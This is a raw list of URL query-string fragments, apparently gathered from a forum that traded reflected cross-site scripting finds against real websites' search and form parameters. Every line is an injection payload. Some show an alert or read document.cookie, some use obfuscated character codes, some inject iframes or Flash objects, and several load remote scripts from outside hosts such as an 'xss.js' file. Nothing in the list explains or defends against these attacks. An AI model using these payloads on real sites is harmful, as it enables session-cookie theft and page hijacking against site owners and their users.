&artistName=and%20courtesy%20of%20Apple%3C/strong%3E%3F%3Ciframe%20src%3D%22http%3A//www.reddit.com/r/xss/new/%22%20width%3D%22643%22%20height%3D%22239%22%20frameborder%3D%220%22%3E%3C/iframe%3E%3Cbr/%3EGood%20job,%20Apple&thumbnailUrl=http%3A//www.fireblog.com/wp-content/uploads/2009/04/xss-threat3.jpg&albumName=XSS%20Exploits
&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E
&res=');%3C/script%3E%3Ciframe%20width=500%20height=500%20src=//bit.ly/1628nB%3E%3C!--
&file=%22%3E%3Cimg%20src=//bit.ly/2avPU%3E%3C!--
&&afp=%22%3E%3Cscript%3Ealert%28%27xssd%27%29;%3C/script%3E&afu=%22%3E%3Ctextarea%3E
&date=%22%3E%3Cscript%3Ealert%28%27xssd%27%29;%3C/script%3E%3Ctextarea%3E
&search=%3Cobject+width%3D%22425%22+height%3D%22344%22%3E%3Cparam+name%3D%22movie%22+value%3D%22http://www.youtube.com/v/0Bmhjf0rKe8%26color1%3D0xb1b1b1%26color2%3D0xcfcfcf%26hl%3Dnl_NL%26feature%3Dplayer_embedded%26fs%3D1%22%3E%3C/param%3E%3Cparam+name%3D%22allowFullScreen%22+value%3D%22true%22%3E%3C/param%3E%3Cparam+name%3D%22allowScriptAccess%22+value%3D%22always%22%3E%3C/param%3E%3Cembed+src%3D%22http://www.youtube.com/v/0Bmhjf0rKe8%26color1%3D0xb1b1b1%26color2%3D0xcfcfcf%26hl%3Dnl_NL%26feature%3Dplayer_embedded%26fs%3D1%26autoplay%3D1%22+type%3D%22application/x-shockwave-flash%22+allowfullscreen%3D%22true%22+allowScriptAccess%3D%22always%22+width%3D%22425%22+height%3D%22344%22%3E%3C/embed%3E%3C/object%3E&submit.x=0&submit.y=0
&locale=en_US&gameId=1;alert%28%27xssd%27%29;
&URL=%27;%22;alert%28%27xssd%27%29;a=%22
&eq=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
&%27;}alert%28%27xssd%27%29;%3C/script%3E
&Referer=lolwat%27%29;alert%28document.cookie%29;new%20Button%28%27
&ics_src=%22%3E%3Cimg%20src=%22http://tinyurl.com/yjmg7z9%22%20onload=%22alert%28document.cookie%29%22%3E
&xfrom=1&search=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&ind=1&zoek1=yes
&search=<script>alert(document.cookie)</script>
&zoekterm=%3Cscript%3Ealert(document.cookie);%3C/script%3E
&text=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
&criteria=%3Cscript%3Ealert(%22XSS!%22);%3C/SCRIPT%3E
&s=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
&&s=site:reddit.com&fltdigg=%27;alert%28document.cookie%29;a=%27
&_nfpb=true&_pageLabel=search&Ntt=<script>alert(unescape(document.cookie));</script>
&query=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&mode=author
&catText=%3Cscript%3Ealert(document.cookie);%3C/script%3E
&i=%3C%2Ftitle%3E%3Cmarquee%3E%3Cimg+src%3D%22http%3A%2F%2Fstatic.reddit.com%2Freddit.com.header.png%22%2F%3E%3C/marquee%3E%3Ctitle%3E
&q=oreally&submit=SEARCH&DYM=oreilly&u1=%27;!--%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
&query=xss protection&siteAlias="<img src="http://thumbs.reddit.com/t5_2qxe8.png
&queryType=nonparsed&query="<marquee><img src="http://thumbs.reddit.com/t5_2qxe8.png
&returnto=%22%3Cimg%20src=%22http://thumbs.reddit.com/t5_2qxe8.png
&cx=003481944941899604444%3Ad947h5mvseo&cof=FORID%3A10&ie=UTF-8&q=%3Cimg+src%3Dhttp%3A%2F%2Fthumbs.reddit.com%2Ft5_2qxe8.png%3Fv%3D60c0bc6ee97246414e7b0738fb0040ef%2F%3E&sa.x=0&sa.y=0&sa=search#262
&siteId="<img src="http://thumbs.reddit.com/t5_2qxe8.png
&q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
&page=answers&type=search&searchid=1260543686413&question_box=rddt%3Cbody%20onload=alert%28document.cookie%29%3Erddt&ichbox[]=en-US
&SQ=%22xss+protection%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%22&act=RSR&searchAID=&forumID=8
&page=answers&type=search&searchid=%22%3Cmarquee%3E%3Cimg+src%3D%27http%3A%2F%2Fstatic.reddit.com%2Freddit.com.header.png%27%2F%3E%3C/marquee%3E
&q=%22%3Cscript%3Ealert%28%22HA!%22%29;%3C/script%3E%3Cp
&Ntk=All&Ntx=mode+matchallpartial
&qry=duh&searchKey=television&skp=17_163&tgt=%27;!--%22%3E%3Cembed%20width=600%20height=500%20src=http://www.youtube.com/v/8n1hKQULa9Y%3E
&RequestedPage=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3Cp
&Query=%22%3Cmarquee%3E%3Cstrike%3E%3CIMG+SRC%3D%22http://i.imgur.com/X2rwY.jpg%22%3E%3Cscript%3Ealert%28%22smrk3r%22%29%3B%3C%2Fscript%3E%3Cp&target=article
&&tutorial=%22%3Cmarquee%3EPreventing%20xss%20attacks%3Ca
&symb=%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3Ca
&id=2869&action=register&redirectfullurl=%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3Ca
&partNumber=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
&productPageUrl="><script>alert(String.fromCharCode(88,83,83))</script>
&finalDestination="><script>alert('You have been hacked!')</script>
&search=<script>alert(document.cookie)</script>
&action=load&temID=search&seachtxt=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
&Key=ident&Key2="><script>alert(String.fromCharCode(88,83,83))</script>
&start=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E
&img=%27%3C/script%3E%3Ch1%20style=%27font-size:200px;color:red;position:absolute;top:0px;left:0px;background-color:black%27%3EXSS%3C/h1%3E
&domain=--><script>alert(1)</script>-->
&zipcode="><script>alert(String.fromCharCode(88,83,83))</script>
&fuseAction=projects.view&&project_id="><script>alert(String.fromCharCode(88,83,83))</script>
&FuseAction=Search.Results&Keywords="><script>alert(String.fromCharCode(88,83,83))</script>
&func=detail&group_id=73833&atid=539099&aid="><script>alert(String.fromCharCode(88,83,83))</script>
&start=41&perpage=10&col=ndguard&summary="'/><script>alert(String.fromCharCode(88,83,83))</script>
&action=check_availability&goto=metarefresh&formaction="><script>alert(String.fromCharCode(88,83,83))</script>
&ContentID=133&SiteID="><script>alert(String.fromCharCode(88,83,83))</script>
&source="><script>alert(String.fromCharCode(88,83,83))</script>
&us=ndmnews&as="><img%20src="http://imgur.com/images/mario-404.gif"</>&q=a
&newsCategory="'/><script>alert('XSS')</script>
&storeId=10701%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E&catalogId=10051
&list="><script>alert(String.fromCharCode(88,83,83))</script>
&collection=81"><script>alert(String.fromCharCode(88,83,83))</script>
&foo=<SCrIPT>alert("PLEASE PHOTO MY FACE")</SCrIPT>
&foo=<SCrIPT>alert("I BEESEECH THEE, PHOTOETH MINE VISAGE")</SCrIPT>
&id=1&cat=<script>alert('pleasephotomyface')</script>
&name=Search&action=search&overview=1&bool=AND&active_polling%0D%0Aweblinks=1&active_address_book=1&active_consultation=1&active_forum=1&active_requirements=1&active_calendar=1&active_guestbook=1&active_questionnaire=1&active_seminar=1&active_stories=1&active_downloads=1&active_users=1&active_subjects=1&q=1%22+onmouseover=alert%28String.fromCharCode%2872,101,108,108,111,32,87,111,114,108,100,33%29%29+&search=&search_area=all
&q="><script>alert(String.fromCharCode(88,83,83))</script>
&s="><script>alert(String.fromCharCode(88,83,83))</script>
&s_all=1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert%28String.fromCharCode%2888,83,83%29%29%3B%3C/ScRiPt%3E&s_any=1%00%22%27%3E%3CScRiPt%20%0A%0D%3Ealert%28String.fromCharCode%2888,83,83%29%29%3B%3C/ScRiPt%3E.&s_exact=1%00%27%22%3E%3CScRiPt%20%0A%0D%3Ealert%28String.fromCharCode%2888,83,83%29%29%3B%3C/ScRiPt%3E.&s_without=1%00%22%27%3E%3CScRiPt%20%0A%0D%3Ealert%28String.fromCharCode%2888,83,83%29%29%3B%3C/ScRiPt%3E&action=search
&search="><script>alert(String.fromCharCode(88,83,83))</script>
&alphabet="><script>alert(String.fromCharCode(88,83,83))</script>
&q="><script>alert(String.fromCharCode(88,83,83))</script>
&language=1%3C/textarea%3E%3CScRiPt%20%0A%0D%3Ealert%28unescape%28/brb%2c%20mysql%20manual/.source%29%29%3B%3C/ScRiPt%3E
&month=12&year=1%22+onmouseover=alert%28String.fromCharCode%2873,108,32,68,65,84,79,32,73,78,32,67,79,83,84,82,85,90,73,79,78,69,44,32,70,70,83%29%29+
&Module=SMMComplain&SMMOp=View&enter=SAMECRAP&SMM_CMD=SendLetter&SMMComplain_View_URL=1%3Cimg+src=http://talks.php.net/presentations/slides/php-under-attack/xss.png+onload=alert%28unescape%28/xss/.source%29%29%3E&SMMComplain_View_Message=WORKSOK@fbi.gov.edu
&Module=SMMNewsAgency&SMMOp=View&enter=EnterStuff&SMM_CMD=1%%27%22%3E%3CsCrIpT%20%3Ealert%28String.fromCharCode%2884,72,73,82,49,51,69,78,46,67,76,73,67,75,83%29%29;%3C/sCrIpT%3E&SMMContactUs_View_Parts=WHATISLOVE&SMMContactUs_View_Name=BABYDONTHURTME&SMMContactUs_View_EMail=DONTHURTME&SMMContactUs_View_URL=NOMORE&SMMContactUs_View_DEN%20DEN%20DEN%20DEN&SMMContactUs_View_Message=HEADBANGHEADBANG&SMMContactUs_View_Emergency=TILTTOTHELEFT
&search=1%22+onmouseover=alert%28String.fromCharCode%2877,111,117,115,101,79,118,101,114,32,87,105,110,33%29%29+&mode=anywords&submit=Go
&zoom_query=FFFFUUUUUroot@fbi.fun&zoom_per_page=AWWWWYEEEEEEAH&zoom_and=0&zoom_sort=1%3E%22%3E%3CScRiPt%20%3Ealert%28String.fromCharCode%2878,111,32,114,101,115,117,108,116,115,32,102,111,114,32,34,85,115,101,102,117,108,32,73,110,102,111,114,109,97,116,105,111,110,34%29%29;%3C/ScRiPt%3E
&str="><script>alert(String.fromCharCode(88,83,83))</script>
&pdf=NOOOO&state=ANY%20TEXT%20HERE&st=1%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E
&tree=411"><script>alert(String.fromCharCode(88,83,83))</script>
&url=iel5%2F8945%2F28322%2F01266233.pdf%3Farnumber%3D1266233"><script>alert(String.fromCharCode(88,83,83))</script>
&Term='"></title><script>alert(xss)</script>><marquee><h1>XSS</h1></marquee>
&query=1%22+onmouseover=alert%28String.fromCharCode%2867,108,105,99,107,32,79,75,32,105,102,32,121,111,117,32,112,114,101,102,101,114,32,67,111,99,97,45,67,111,108,97,46%29%29+
&page=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E%22
&filename=index.html&filepath=Honesty.%3CScRiPt%20%0A%0D%3Ealert%28String.fromCharCode%2885,108,116,105,109,97,32,85,110,100,101,114,119,111,114,108,100,32,104,97,115,32,109,111,114,101,32,34,65,118,97,116,97,114,105,99,32,82,101,118,101,108,97,116,105,111,110,34,32,116,104,97,110,32,116,104,105,115,32,99,104,97,114,97,99,116,101,114,44,32,110,111,32,111,102,102,101,110,115,101,46%29%29%3B%3C/ScRiPt%3Ewithin.this.organization.DOC...
&opc=2"><script>alert(String.fromCharCode(88,83,83))</script>
&u="><script>alert(String.fromCharCode(88,83,83))</script>
&start="><script>alert(String.fromCharCode(88,83,83))</script>
&search=ads%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&ci=1
&q=as"><script src="http://www.yourjavascript.com/38310202111/xss.js">
&p=2&q=wine"><script src="http://www.yourjavascript.com/38310202111/xss.js">&x=0&y=0
&keyword=zina"><script src="http://www.yourjavascript.com/38310202111/xss.js">&Search=++++++&winestyle=&grapevariety=&wineRegion=&winePrice=
&from=pooptato&to=<font%20color=00ff00><marquee%20BEHAVIOR=ALTERNATE%20BGColor=black><plaintext>
&SearchID=3125843&SearchRefineID=6695888&KeyWord=l%22%3E%3Cscript%20src=%22http://www.yourjavascript.com/38310202111/xss.js%22%20/%3E
&s=m"><script>alert('xss')</script>
&q=%3CSCRIPT%3Ealert(%22VOTE%20FOR%20ZACH%20ANNER!%22)%3C/script%3E
&term=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%61%6C%65%72%74%28%22%58%53%53%22%29%3E
&intcmp=nws-hd-srch&searchTerm=%3Cbody%20onload=alert(document.cookie)%3E
&woord=%3Cbody%20onload=alert('XSS')%3E
&v=xss'%3E%3C/a%3E%3Cscript%20src%3D%22http://www.yourjavascript.com/38310202111/xss.js%22%3E%3C/script%3E
&q=%22%3E%3C/script%3E%3Cbody%20onload=alert(%22XSS%22)%3E
&search_keywords=zo%3Cbody%20onload=alert(%22XSS%22)%3E
&titleOrPublisher=%3Cbody%20onload=alert(%22XSS!%22)%3E&searchType=title&rating=&ratingsCriteria=&platforms=&platformsCriteria=&searchVersion=compact&content=&searchType=title&contentCriteria=&newSearch.x=38&newSearch.y=11
&q=%3Cbody%20onload=alert(%22XSS%22)%3E
&x=0&y=0&s=%3Cbody%20onload=alert(%22XSS%22)%3E
&Keywords=%22%22%3Cscript%3Ealert(%22xss%22)%3C/script%3E
&keywords='<script>alert(String.fromCharCode(88,83,83))</script>
&q=%3Cbody+onload%3Dalert(%22XSS%22);%3E
&as2n32vujas83bn2932g=645492598632
&subSection=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&headParams=management
&qt=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&published=on&active_tab=site
&c=10"><script>alert('XSS')</script>
&&product_name="><script>alert('XSS')</script>
&q=');};alert(%22XSS%22);//
&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
&page_id=4046&portal_prefix="><script>alert('XSS')</script>
&src=/images/diagrams/webmarshal_large.gif&w="><script>alert('XSS')</script>
&method=%22;alert(%22XSS%22);//&q=XSS&q2=&q3=&q4=&c=en_US&results=10
&page_id=6&td_id=200800024"><script>alert(document.cookie)</script>
&id=244090"><script>alert(String.fromCharCode(88,83,83))</script>
&id=396&rub=11"><script>alert(document.cookie)</script>
&searchString=asd%22%3E%3Cscript+src%3D%22http%3A%2F%2Fwww.yourjavascript.com%2F38310202111%2Fxss.js%22%3E&ctry=us&button=Go
&location=<script>alert("xss");</script>&panel=poi&submit=Show+map&intCam=intViewAMapOf
&event=11&broadcastType=1&jspLocation=/jsp/tv_listings_search.jsp&jspError=/jsp/error.jsp&searchString=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E
&area=search&q="%20onclick='alert("XSS");'
&Gemeente=Almere%22%20onclick='alert(%22XSS%22);'%20%22
&search=%3Cbody%20onload=alert(%22XSS%22)%3E
&action=search-events&where=%22%3E%3Cbody%20onload=alert(%22XSS%22)%3E%3Cinput%20%22
&url=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
&q=asd%22%3E%3Cscript+src=%22http://www.yourjavascript.com/38310202111/xss.js%22%3E&x=0&y=0
&words=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E
&filter=%22%20onclick='alert(%22XSS%22)'%20%22&order=ryear&limit=25&option=com_jombib&catid=$catId
&title="><script>alert('XSS')</script>
&q=%22};%20alert(%22XSS%22);%3C/script%3E
&term="%20onfocus="if%28!this.a%29{alert%28String.fromCharCode%2888,83,83%29%29}this.a=1;"%20AUTOFOCUS/>
&issue=%22+onfocus=if%28!this.a%29{alert%28String.fromCharCode%2888,83,83%29%29;this.a=1;}//%20AUTOFOCUS=%22&id_prd=-1&id_pty=-1&type=3&stype=1&MM_submit=Perform+search
&s='%29;%20alert%28'XSS
&searchType=0&service=BRN&serviceType=BRN&partner=&ZIP=60510&street="><script>alert('XSS')</script>
&search_text=%22;alert%28%22XSS%22%29;//&sort=date&x=0&y=0
&includePage=0103020000e.cfm&idToOpen=2420&ThisStartResultPage=4&ThisPage="<marquee><img src=k onerror=alert("XSS") />
&blob=%3Cbody%20onload=alert%28%22XSS%22%29%3E
&domain=<script>alert%28String.fromCharCode%2888,83,83%29%29</script>
&Search=xss"><script+src="http://www.yourjavascript.com/38310202111/xss.js">
&q=fox"%29;%20alert%28"XSS"%29;//&submit=Search
&nftype=empty&queryText=%22;+alert%28%22XSS%22%29;//&_requestid=305979
&bw=zoek&taal=nl&letter=&zoek3=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29;%3C/script%3E
&search_tag=hoi%22%3E%3Cbody%20onload=alert%28%22XSS%22%29%3E
&proxystylesheet=DCUK&site=ukDiscovery&client=DCUK&region=uk&output=xml_no_dtd&getfields=*&filter=1&ie=utf8&oe=utf8&q=%22;+alert%28%22XSS%22%29;//&searchbtn=go
&amount=50.0&currency_code=USD&sender_country="><script>alert('XSS')</script>
&id=9437&tref=A%22%29;%20alert%28%22XSS%22%29;%20//
&ss=1&p=1&country=ve&producto="><script>alert(String.fromCharCode(88,83,83))</script>
&ncid="><script>alert('XSS')</script>
&id=3944&qt=%22%29;%20alert%28%22XSS
&tbid="><script>alert('XSS')</script>
&pid=11452087&cat=438&msort=rebatedesc&mnpos="><script>alert('XSS')</script>
&searchTerm=';alert(document.cookie);}//&search=
&Genre=Tech%20Note&PKey="><script>alert('XSS')</script>
&sType=BEGINSECURE&sProcess_Name="><script>alert('XSS')</script>
&searchInput=%22;%20window.onload=function(){alert(0);}//
&searchstring=%22onfocus=%22alert(document.cookie)%22autofocus=%22&searchtype=allproducts&searchsource=0
&site=www.aegonbank.nl&mediasurface_target=/%3Fview%3DSearch%2Bresults&view=Search+results&freesearch=%3Cbody%20onload=alert%28%22XSS%22%29%3E
&site=NYUWeb_Main&client=its_new_frontend&output=xml_no_dtd&proxystylesheet=its_new_frontend&proxyreload=1&sitesearch=www.nyu.edu/its&q=%22/%3E%3Cbody+onload%3Dalert%28%22XSS%22%29%3E&submit.x=0&submit.y=0
&type="><script>alert('XSS')</script>
&p=foglia_giochi_1&sezione=pub&sottosezione="><script>alert('XSS')</script>
&i=mandelbrot&a=*C.mandelbrot-_*Formula.dflt-&f2=-0.5&f=MandelbrotSet.rec_-0.5&f3=666&f=MandelbrotSet.imc_666%22%20alt=%22MandelbrotSet.imc%22%20%20name=f3%20/%3E%3Cbody%20onload=alert%28%22XSS%22%29%3E%3Cspan
&reqCode=browseBASEE&myEmsbarCode=0680127282884&mailNum="/><script>alert%28%22XSS%22%29</script><span %22&optijiaot.x=29&optijiaot.y=7&D0D14672D61192C57F6E4C7=7%23pg
&keywords=%3Cscript%3Ealert(0)%3C/script%3E
&status=XSS%2Bhttp%253A%252F%252F%27%26alert%28%22XSS%22%29%26%27
&q=%3C/title%3E%3Cscript%3Ealert%280%29%3C/script%3E%3Ctitle%3E&mpb=1&SearchSourceOrigin=19
&sitearea=o2shop&query=%22%3Cscript%3Ealert(0)%3C/script%3E
&id=0205"><script>alert(String.fromCharCode(88,83,83))</script>
&N=0&Ntk=primary&Ntx=mode+matchallpartial&Ntt='</script><script>alert(0);//
&searchitems='"/><script>alert%28String.fromCharCode%2888,83,83%29%29</script>&search=Search
&num=6'%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
&q=%22%3E%3Cbody%20onload=alert%28/XSS/.source%29%3E
&q='%29;}%20alert%28/XSS/.source%29;%20function%20dub%28a%29%20{//
&app="><script>alert%28"XSS"%29</script>&return_url=
&query=XSS&ps=&loc=searchbox&tab=web&currProv=lygo&mode=&dfi=<script>alert%28"XSS"%29</script>
&search=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
&where=%3Cbody%20onload=alert%28/XSS/.source%29%3E
&s=';alert(0)//
&f%3AsearchInputString=%27%22%3E%3Cscript++type%3D%22text%2Fjavascript%22%3Ealert%28%22hi%2C+reddit%22%29%3Bdocument.write%28%27%3Cimg+src%3D%22http%3A%2F%2Fthumbs.reddit.com%2Ft5_2qxe8.png%3Fv%3D60c0bc6ee97246414e7b0738fb0040ef%22%2F%3E%27%29%3C%2Fscript%3E%3Cdiv+id%3D%22&f%3Asearch=+&formID=globalSearchForm
&qh=&section=&q=';alert(0)//
&q=I hope Matt can stand a joke"%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&searchappbutton.x=0&searchappbutton.y=0&t=simple
&tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E
&DestAddress=23901%20East%20Orchard%20Road%3Cobject%20data=%22http://dl.dropbox.com/u/1437645/meaningless/flashbomb.swf%22%20type=%22application/x-shockwave-flash%22%3E%3Cparam%20name=%22movie%22%20value=%22http://dl.dropbox.com/u/1437645/meaningless/flashbomb.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cparam%20name=%22FlashVars%22%20value=%22swfsrc=http://dl.dropbox.com/u/1437645/meaningless/boring.swf%22%20/%3E%3C/object%3E&DestCity=Aurora&DestState=CO&DestPostalCode=80016&DestLat=39.600259&DestLng=-104.711478&DestPhone=%28303%29%20400-4106&DestName=Southlands%20%28Aurora%29&DestNumber=1031&DestCountry=US&OriginStreet=&OriginCity=&OriginState=&OriginPostalCode=80012&OriginCountry=US
&searchPhrase=super%20hijack%20fun%20time+%3Ci%3E%3Cobject%20data=%22http://www.mustardlab.com/developer/fun/flashbomb.swf%22%20type=%22application/x-shockwave-flash%22%3E%3Cparam%20name=%22movie%22%20value=%22http://www.mustardlab.com/developer/fun/flashbomb.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cparam%20name=%22FlashVars%22%20value=%22swfsrc=http://www.mustardlab.com/developer/fun/dance.swf%22%20/%3E%3C/object%3E%3C/i%3E&listViewSize=&indexStart=0&sortBy=&sortOrder=&categories=&skucolor=&priceLow=&priceHigh=&skusize=&brand=
&cat=M&subcat=S&prodname=<object%20width=480%20height=385><param%20name=movie%20value=http://www.youtube.com/v/OXc5ltzKq3Y
&Query=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&target=article&sortby=display_time+descending
&query=aal%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&x=0&y=0
&q=wewt%3C/title%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
&text=file-sharing/universities&page="><script>alert('XSS')</script>
&query=<script>alert('XSS')</script>
&q=a&r=home_home&p=bigtop'style='position:fixed;left:0;top:0;width:10000px;height:10000px'onmouseover='alert(0)
&movieid=681&refid=&subkey="><script>alert('XSS')</script>
&keywords=%22%3E%3Cscript+type%3D%22text/javascript%22%3Ealert(%22Hello,+/r/XSS%22);%3C/script%3E&x=0&y=0&search_section=products
&q=%3Cscript%3Ealert%28%221%22%29%3C/script%3E
&search=<body onload=alert%28%22XSS%22%29>&x=0&y=0
&q=%3Cbody%20onload=alert%28%22XSS%22%29%3E
&search=%3Ciframe%20src='http://reddit.com/r/xss'%20width='500'%20height='600'%3E%3C/iframe%3E
&searchType=global&N=0&Ntt=;!--"<iframe src='http://reddit.com/r/xss' width='1024' height='600'></iframe>
&page=1&query=;!--%22%3Ciframe+src%3D'http://reddit.com/r/xss'+width%3D'1024'+height%3D'600'%3E%3C/iframe%3E
&month=dec&yr="><script>alert(document.cookie)</script>
&search='';!--%22%3Cscript%3Ealert('Hello%20Reddit')%3C/script%3E&category=artisttitle
&id=%22/%3E%3CEMBED%20SRC=%22//reddit.com/r/xss%22%20width='500'%20height='500'''%3E%3C/EMBED%3E
&q="><script>alert('XSS')</script>
&action=advanced_search&query="><script>alert('XSS')</script>
&q=%3Cscript%3Ealert('Hello%20Reddit');%3C/script%3E
&search=%22%3E%3Cscript%3Ealert(0);%3C/script%3E&button=GO
&q=%3CBODY+ONLOAD+%3Dalert('XSS')%3E
&coursecode=SC&infotype="><script>alert('XSS')</script>
&&sort="><script>alert('XSS')</script>
&customization_result=%22%3E%3Cscript%3Ealert%28/hi/.source%29%3C/script%3E
&display=none&hid=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
&=%3Cscript%3Ealert(%22Canada%20Xss%22)%3C/script%3E
&action=install&name=Offline%20Mail&message=Hi,%20Reddit&icon_src=http%3A%2F%2Fmail.google.com%2Fmail%2Fimages%2F2%2Fmail_icon_48.png&return=https%3A%2F%2Fmail.google.com%2Fmail%2F%23lsci
&btnSearch=all&searchText=<script>alert%28%22XSS%22%29</script>
&action=search&storeid=2557708&searchtext=%22%3Cscript%3Ealert('Hello%20Reddit')%3C/script%3E&submitbutton.x=0&submitbutton.y=0
&storeId=10151&langId=-1&catalogId=10051&N=0&newSearch=true&Ntt=%22%3Ciframe%20src=%22http://reddit.com/r/xss%22%20width=%22800%22%20height=%22600%22
&s=%3C/title%3E%3Cbody+onload%3Dalert(1)%3E&Search=Search&comic=23&show=advanced&b=1&t=1
&s=%3Cscript%3Ealert(0)%3C/script%3E
&keyword=%22\\%3E%3Cimg%20src=x%20onerror=alert(0)%3E%3Ciframe%20src=http://www.reddit.com/r/xss%20height=800%20width=600%3E%3C/input&what=all&search_btn.x=0&search_btn.y=0
&query=Search-word%3Cscript%3Ealert('Sup%20reddit
&action=file&text=%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
&q=%22\\%3E%3Cimg+src%3Dx+onerror%3Dalert(0)%3E
&search="><script>alert('XSS')</script>
&k=<script>alert('XSS');</script>&s=Entire+Site
&name111=%22\\%3E%3Cscript%3Ealert(0)%3C/script%3E
&ID=239&AT=%3Cscript%3Ealert('port22%20-%20:D');%3C/script%3E
&dsNav=Ntk:TitleKeyword|%3Cscript%3Ealert%28%27XSS%27%29%3b%3C%2fscript%3E|1|
&q=%22--%3E%3C/script%3E%3Cscript%20src=%22http://ha.ckers.org/xss.js%22%20type=%22text/javascript%22%3E%3C/script%3E%3Cscript%3E\\&cc=us&lang=en
&kw=%27;alert%28%27XSS%27%29;//
&word=%3Cscript%3Ealert%28/XSS/.source%29;%3C/script%3E
&categ=ass&prod=%3Cimg%20src=%22http://a1055.g.akamai.net/f/1055/1401/5h/images.barnesandnoble.com/images/12400000/12403880.jpg%22%3E
&query=%22;alert%28%27XSS%27%29;s.prop1=%22
&latitude=&city=&zip=&longitude=&state=&lonlatRequired=N&keyWord="><script>alert%28"XSS"%29</script>&address=&country=AF&pageDropDown=1&sortType=DEFAULT&sortType=5&countryCd=AF&countryName=AFGHANISTAN
&q=%22%2balert%28%22XSS%22%29%2b%22&ref=index
&query=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
&pageSection=free_home_game_search&pogoword=%27%29;alert%28/xss/.source%29;//
&lang=en&page=49&tbmonth=09&tblng=1&tbyear=2010'%22%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E&tbfrom=0&tbto=30
&search=%22%3E%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
&cat=All&searchText=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&x=0&y=0
&PageFlow="><script>alert(String.fromCharCode(88,83,83))</script>
&WRD='%20|%20alert%28'XSS'%29%20|%20'&ern=200
&term="</title><script>if (!window.xss) { window.xss=1; alert("XSS"); }</script>&start=0
&query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
&keyword=%22;alert%28%27XSS%27%29;//
&N=8110&Ntk=All&Ntt=%22%3Balert%28%27XSS%27%29%3B%2F%2F&Nty=1&D=%22%3Balert%28%27XSS%27%29%3B%2F%2F&Ntx=mode+matchallpartial&Dx=mode+matchallpartial&sid=12C953F338E0&srchLocalCode=us
&nftype=empty&site_id=InformationWeek&queryText=%22%3Balert%28%27XSS%27%29%3B//&_requestid=116467
&searchstring=%22onmouseover=%22alert%28%27XSS%27%29
&search=site&searchbutton=Go&keywords=%22%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
&nid=220&query=%22%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,88,83,83,39,41%29%29;%3C/script%3E&x=23&y=8
&action=QueryAction.submitBasicSearch&type_basic=extern&sortOrder=&pageNumber=1&q='><body%20onload=alert%28"XSS"%29>&hdrsrchsubmit.x=0&hdrsrchsubmit.y=0&hdrsrchsubmit=Search
&keywords=%22%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%22&submit=Search+Again
&tab=searchtabgeneraldark&MT=%22%3E%3Cbody%20onload=alert%28%22XSS%22%29%3E
&q0=%22;alert%28%27XSS%27%29;//
&topic=%22%20onload=%22alert%28'XSS'%29
&searchString=%22;alert%28%27XSS%27%29;//&searchSubmit=
&e=50&i=50_50.gif&p=50%3Cscript%3Ealert('XSS')%3C/script%3E
&q=%22;alert%28%27XSS%27%29;//&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
